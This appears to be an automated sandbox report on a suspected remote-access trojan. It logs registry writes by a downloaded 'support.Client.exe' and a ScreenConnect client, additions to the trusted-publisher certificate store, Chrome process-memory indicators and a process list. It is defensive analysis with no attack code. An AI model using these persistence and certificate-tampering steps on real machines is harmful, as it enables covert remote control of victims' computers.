Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\lock!0a000000878d5b0e541200008c0a0000000000000000000 = 30303030313235342c30316461346662353165363365313031 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_24537eb26d6ad4ad C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!0c000000878d5b0e541200008c0a0000000000000000000 = 30303030313235342c30316461346662353165363365313031 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\Transform = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_6c2e4193f8f6130c C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7\lock!10000000b68d5b0e541200008c0a0000000000000000000 = 30303030313235342c30316461346662353165363365313031 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_fd4f63879c71b908\pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5} C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\DigestValue = ce77b0812363223bb04bfee60d383987ca405225 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_24537eb26d6ad4ad\LastRunVersion = 68747470733a2f2f6465736b746f6f6c2e62757a7a2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\OnlineAppQuotaUsageEstimate = "3391391" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\lock!16000000873e5c0e38060000c00a0000000000000000000 = 30303030303633382c30316461346662353339366665623738 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 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 C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 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 C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4100 wrote to memory of 3316 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 4976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffac9ef9758,0x7ffac9ef9768,0x7ffac9ef9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://google.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1764 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4556 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5088 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5108 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3328 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5616 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5536 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5912 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5924 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Users\Admin\Downloads\support.Client.exe

"C:\Users\Admin\Downloads\support.Client.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

